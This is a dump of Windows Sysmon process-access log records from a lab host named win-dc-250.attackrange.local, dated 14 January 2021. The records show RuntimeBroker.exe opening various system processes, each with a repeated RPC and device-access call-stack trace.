13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8700-000000009A01}4792C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8500-000000009A01}4280C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8700-000000009A01}4792C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8500-000000009A01}4280C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 